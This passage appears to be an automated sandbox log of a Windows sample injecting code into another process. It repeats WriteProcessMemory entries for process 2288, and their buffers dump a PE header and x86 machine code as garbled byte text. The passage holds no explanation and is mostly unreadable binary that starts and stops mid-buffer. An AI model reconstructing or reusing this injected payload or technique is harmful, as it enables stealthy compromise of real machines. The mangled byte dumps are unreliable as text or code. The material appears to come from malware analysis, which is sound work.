èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x0000017c
base_address: 0x02541000
success 1 0
1619691122.458625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x0000017c
base_address: 0x02594000
success 1 0
1619691122.473625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x0000017c
base_address: 0x025a0000
success 1 0
1619691122.473625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x0000017c
base_address: 0x025a1000
success 1 0
1619691122.473625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x0000017c
base_address: 0x025f4000
success 1 0
1619691122.505625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x000001f0
base_address: 0x02600000
success 1 0
1619691122.505625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x000001f0
base_address: 0x02601000
success 1 0
1619691122.536625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x000001f0
base_address: 0x02654000
success 1 0
1619691122.567625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x000001f4
base_address: 0x02660000
success 1 0
1619691122.567625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x000001f4
base_address: 0x02661000
success 1 0
1619691122.583625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x000001f4
base_address: 0x026b4000
success 1 0
1619691122.614625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x000001f4
base_address: 0x026c0000
success 1 0
1619691122.614625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x000001f4
base_address: 0x026c1000
success 1 0
1619691122.630625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x000001f4
base_address: 0x02714000
success 1 0
1619691122.645625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x000001f4
base_address: 0x02720000
success 1 0
1619691122.645625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x000001f4
base_address: 0x02721000
success 1 0
1619691122.661625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x000001f4
base_address: 0x02774000
success 1 0
1619691122.676625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x000001f4
base_address: 0x02780000
success 1 0
1619691122.676625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x000001f4
base_address: 0x02781000
success 1 0
1619691122.708625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x000001f4
base_address: 0x027d4000
success 1 0
1619691122.723625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x000001f4
base_address: 0x027e0000
success 1 0
1619691122.723625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 